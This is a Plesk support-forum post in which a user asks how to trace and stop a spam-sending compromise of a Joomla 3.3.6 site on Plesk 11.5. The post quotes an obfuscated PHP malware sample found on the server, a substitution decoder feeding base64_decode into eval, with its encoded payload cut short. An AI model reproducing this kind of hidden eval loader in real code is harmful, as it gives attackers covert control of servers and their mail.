• Our team is looking to connect with folks who use email services provided by Plesk, or a premium service. If you'd like to be part of the discovery process and share your experiences, we invite you to complete this short screening survey. If your responses match the persona we are looking for, you'll receive a link to schedule a call at your convenience. We look forward to hearing from you!
  • We are looking for U.S.-based freelancer or agency working with SEO or WordPress for a quick 30-min interviews to gather feedback on XOVI, a successful German SEO tool we’re looking to launch in the U.S.
    If you qualify and participate, you’ll receive a $30 Amazon gift card as a thank-you. Please apply here. Thanks for helping shape a better SEO product for agencies!
  • The BIND DNS server has already been deprecated and removed from Plesk for Windows.
    If a Plesk for Windows server is still using BIND, the upgrade to Plesk Obsidian 18.0.70 will be unavailable until the administrator switches the DNS server to Microsoft DNS. We strongly recommend transitioning to Microsoft DNS within the next 6 weeks, before the Plesk 18.0.70 release.
  • The Horde component is removed from Plesk Installer. We recommend switching to another webmail software supported in Plesk.

[Spam php script] Finding the root cause

minhnv

New Pleskian
Hi all,

My server sending a lot of spam emails via some php script like below and in the attachment.
I can found the file and delete it. After few hours, some other script appear (even after i changed all the password, not sure if spammer upload all the script before or not) and sending spam again.

Some info:
+Joomla 3.3.6 website
+Plesk 11.5
+CentOS 6.5

Action i did:
+ Delete php scipts
+ Change all password related to this subscription: Users,fpt,...
+ Turn off mail service, turn off mail feature in joomla.

What i looking for:
+ Root cause? Please instruct me to find this ( access log ? ip ? ) or somethings else ?
+ How to prevent such problem ?

<?php
function dbwcmxhx($ijljihs, $axdxkatqwt){$jvmpgqagt = ''; for($i=0; $i < strlen($ijljihs); $i++){$jvmpgqagt .= isset($axdxkatqwt[$ijljihs[$i]]) ? $axdxkatqwt[$ijljihs[$i]] : $ijljihs[$i];}
$uh="base64_decode";return $uh($jvmpgqagt);}
$qfzaigliex = 'zh1qC29g7czMGX2SJ89ScXaU7SJNHY02fYA3FA3eCP03cui1Bmwp6h9pcX2SJ89SJS'.
'JNHle3FA3eCP03cui1Bmwp6PEscX2s7PiWBh1U619yCPW1GSAwkmVOmVng7cjtBh1o729NCPW3BmwATfNTm818Th1gJX2yTmj'.
$djvgzn = Array('1'=>'l', '0'=>'5', '3'=>'p', '2'=>'V', '5'=>'Y', '4'=>'8', '7'=>'Z', '6'=>'b', '9'=>'9', '8'=>'m', 'A'=>'w', 'C'=>'a', 'B'=>'d', 'E'=>'F', 'D'=>'i', 'G'=>'J', 'F'=>'O', 'I'=>'h', 'H'=>'I', 'K'=>'L', 'J'=>'c', 'M'=>'o', 'L'=>'U', 'O'=>'7', 'N'=>'s', 'Q'=>'j', 'P'=>'W', 'S'=>'y', 'R'=>'P', 'U'=>'v', 'T'=>'K', 'W'=>'1', 'V'=>'k', 'Y'=>'E', 'X'=>'2', 'Z'=>'r', 'a'=>'x', 'c'=>'X', 'b'=>'6', 'e'=>'A', 'd'=>'S', 'g'=>'z', 'f'=>'T', 'i'=>'N', 'h'=>'G', 'k'=>'M', 'j'=>'R', 'm'=>'C', 'l'=>'D', 'o'=>'t', 'n'=>'B', 'q'=>'u', 'p'=>'n', 's'=>'4', 'r'=>'q', 'u'=>'3', 't'=>'f', 'w'=>'g', 'v'=>'e', 'y'=>'0', 'x'=>'H', 'z'=>'Q');
eval(dbwcmxhx($qfzaigliex, $djvgzn));?>
 

Attachments

  • press - Copy (1).txt
    151.5 KB · Views: 0
  • object - Copy.txt
    151.6 KB · Views: 0
Back
Top